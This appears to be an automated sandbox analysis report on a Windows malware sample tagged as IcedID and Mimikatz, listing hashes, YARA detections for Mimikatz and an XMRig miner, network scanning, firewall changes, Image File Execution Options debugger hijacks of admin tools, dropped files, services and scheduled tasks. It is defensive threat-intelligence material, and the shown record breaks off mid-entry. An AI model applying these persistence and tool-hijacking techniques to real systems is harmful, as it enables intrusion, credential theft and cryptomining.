Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
30/05/2024, 09:46
Behavioral task
behavioral1
Sample
2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe
Resource
win7-20240508-en
General
-
Target
2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe
-
Size
7.9MB
-
MD5
f4da2f0ff1cb778434d64dbba8fcd89c
-
SHA1
e2d8451f12870e921ab2e08bb420b4f542b54700
-
SHA256
d7f9b7273a40afccbe578adeeadfb040a482b5d238b4a9d84123b4ac52304bc8
-
SHA512
c296fde35e3f75dadfd3db7a20b4a1155db80e127bb7ca61dd7f700d77890edb91da4a67da055d74c77e096a7777f3f3222070077dfeff6ea1e9ec62af1ff63d
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 316 created 1440 316 vkdejee.exe 37 -
Contacts a large (30893) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
resource yara_rule behavioral2/memory/3132-137-0x00007FF723C70000-0x00007FF723D5E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 42 IoCs
resource yara_rule behavioral2/memory/2976-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/2976-4-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x000700000002343f-6.dat UPX behavioral2/memory/5016-8-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x0007000000023487-135.dat UPX behavioral2/memory/3132-136-0x00007FF723C70000-0x00007FF723D5E000-memory.dmp UPX behavioral2/memory/3132-137-0x00007FF723C70000-0x00007FF723D5E000-memory.dmp UPX behavioral2/files/0x0007000000023492-144.dat UPX behavioral2/memory/3540-145-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/3540-159-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/files/0x000700000002348f-165.dat UPX behavioral2/memory/3492-168-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX behavioral2/memory/3112-174-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/4240-178-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/4724-182-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/3492-185-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX behavioral2/memory/3772-187-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/2708-191-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/4440-195-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/3492-197-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX behavioral2/memory/4464-200-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/3492-203-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX behavioral2/memory/1812-205-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/1036-209-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/2452-213-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/3492-215-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX behavioral2/memory/5040-218-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/392-222-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/3492-225-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX behavioral2/memory/1832-227-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/4268-230-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/5108-232-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/4060-234-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/3492-235-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX behavioral2/memory/4328-237-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp UPX behavioral2/memory/3492-249-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX behavioral2/memory/3492-250-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX behavioral2/memory/3492-253-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX behavioral2/memory/3492-305-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX behavioral2/memory/3492-312-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX behavioral2/memory/3492-314-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX behavioral2/memory/3492-329-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp UPX -
XMRig Miner payload 13 IoCs
resource yara_rule behavioral2/memory/3492-185-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp xmrig behavioral2/memory/3492-197-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp xmrig behavioral2/memory/3492-203-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp xmrig behavioral2/memory/3492-215-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp xmrig behavioral2/memory/3492-225-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp xmrig behavioral2/memory/3492-235-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp xmrig behavioral2/memory/3492-249-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp xmrig behavioral2/memory/3492-250-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp xmrig behavioral2/memory/3492-253-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp xmrig behavioral2/memory/3492-305-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp xmrig behavioral2/memory/3492-312-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp xmrig behavioral2/memory/3492-314-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp xmrig behavioral2/memory/3492-329-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/2976-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2976-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000700000002343f-6.dat mimikatz behavioral2/memory/5016-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3132-137-0x00007FF723C70000-0x00007FF723D5E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts vkdejee.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts vkdejee.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4724 netsh.exe 4452 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe -
Executes dropped EXE 30 IoCs
pid Process 5016 vkdejee.exe 316 vkdejee.exe 3572 wpcap.exe 2092 pivnitiek.exe 3132 vfshost.exe 652 xohudmc.exe 3540 ibibzztte.exe 1452 wokakm.exe 5000 vkdejee.exe 3492 fpibei.exe 3112 ibibzztte.exe 4240 ibibzztte.exe 4724 ibibzztte.exe 3772 ibibzztte.exe 2708 ibibzztte.exe 4440 ibibzztte.exe 4464 ibibzztte.exe 1812 ibibzztte.exe 1036 ibibzztte.exe 2452 ibibzztte.exe 5040 ibibzztte.exe 392 ibibzztte.exe 1832 ibibzztte.exe 4268 ibibzztte.exe 5108 ibibzztte.exe 4060 ibibzztte.exe 4328 ibibzztte.exe 3876 vkdejee.exe 5024 fuinnkdmr.exe 4736 vkdejee.exe -
Loads dropped DLL 12 IoCs
pid Process 3572 wpcap.exe 3572 wpcap.exe 3572 wpcap.exe 3572 wpcap.exe 3572 wpcap.exe 3572 wpcap.exe 3572 wpcap.exe 3572 wpcap.exe 3572 wpcap.exe 2092 pivnitiek.exe 2092 pivnitiek.exe 2092 pivnitiek.exe -
resource yara_rule behavioral2/files/0x0007000000023487-135.dat upx behavioral2/memory/3132-136-0x00007FF723C70000-0x00007FF723D5E000-memory.dmp upx behavioral2/memory/3132-137-0x00007FF723C70000-0x00007FF723D5E000-memory.dmp upx behavioral2/files/0x0007000000023492-144.dat upx behavioral2/memory/3540-145-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/3540-159-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/files/0x000700000002348f-165.dat upx behavioral2/memory/3492-168-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx behavioral2/memory/3112-174-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/4240-178-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/4724-182-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/3492-185-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx behavioral2/memory/3772-187-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/2708-191-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/4440-195-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/3492-197-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx behavioral2/memory/4464-200-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/3492-203-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx behavioral2/memory/1812-205-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/1036-209-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/2452-213-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/3492-215-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx behavioral2/memory/5040-218-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/392-222-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/3492-225-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx behavioral2/memory/1832-227-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/4268-230-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/5108-232-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/4060-234-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/3492-235-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx behavioral2/memory/4328-237-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp upx behavioral2/memory/3492-249-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx behavioral2/memory/3492-250-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx behavioral2/memory/3492-253-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx behavioral2/memory/3492-305-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx behavioral2/memory/3492-312-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx behavioral2/memory/3492-314-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx behavioral2/memory/3492-329-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 66 ifconfig.me 67 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 vkdejee.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\wokakm.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 vkdejee.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\wokakm.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 vkdejee.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content vkdejee.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\umubtmbps\UnattendGC\specials\spoolsrv.xml vkdejee.exe File created C:\Windows\gibpmken\schoedcl.xml vkdejee.exe File opened for modification C:\Windows\umubtmbps\Corporate\log.txt cmd.exe File created C:\Windows\umubtmbps\UnattendGC\specials\exma-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\coli-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\schoedcl.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\docmicfg.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\spoolsrv.xml vkdejee.exe File created C:\Windows\umubtmbps\Corporate\mimidrv.sys vkdejee.exe File opened for modification C:\Windows\gibpmken\vkdejee.exe 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe File created C:\Windows\umubtmbps\UnattendGC\specials\schoedcl.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\docmicfg.xml vkdejee.exe File created C:\Windows\gibpmken\svschost.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\svschost.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\Shellcode.ini vkdejee.exe File created C:\Windows\umubtmbps\Corporate\vfshost.exe vkdejee.exe File created C:\Windows\gibpmken\vkdejee.exe 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe File created C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\trfo-2.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\tucl-1.dll vkdejee.exe File opened for modification C:\Windows\umubtmbps\bbrcgicuu\Result.txt fuinnkdmr.exe File created C:\Windows\umubtmbps\UnattendGC\specials\posh-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\ucl.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\vimpcsvc.xml vkdejee.exe File created C:\Windows\gibpmken\vimpcsvc.xml vkdejee.exe File created C:\Windows\gibpmken\docmicfg.xml vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\scan.bat vkdejee.exe File opened for modification C:\Windows\umubtmbps\bbrcgicuu\Packet.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\xdvl-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\spoolsrv.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\vimpcsvc.xml vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\Packet.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\svschost.exe vkdejee.exe File created C:\Windows\gibpmken\spoolsrv.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\AppCapture64.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\ssleay32.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\crli-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\trch-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\vimpcsvc.exe vkdejee.exe File created C:\Windows\umubtmbps\Corporate\mimilib.dll vkdejee.exe File opened for modification C:\Windows\gibpmken\schoedcl.xml vkdejee.exe File created C:\Windows\umubtmbps\upbdrjv\swrpwe.exe vkdejee.exe File created C:\Windows\ime\vkdejee.exe vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\wpcap.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\cnli-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\zlib1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\svschost.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\libxml2.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\schoedcl.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\svschost.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\tibe-2.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\docmicfg.exe vkdejee.exe File opened for modification C:\Windows\gibpmken\vimpcsvc.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\docmicfg.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\AppCapture32.dll vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\ip.txt vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\wpcap.dll vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\fuinnkdmr.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\libeay32.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\spoolsrv.exe vkdejee.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3088 sc.exe 4916 sc.exe 4924 sc.exe 860 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000700000002343f-6.dat nsis_installer_2 behavioral2/files/0x000700000002344b-14.dat nsis_installer_1 behavioral2/files/0x000700000002344b-14.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1244 schtasks.exe 3560 schtasks.exe 5112 schtasks.exe -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ vkdejee.exe Key created 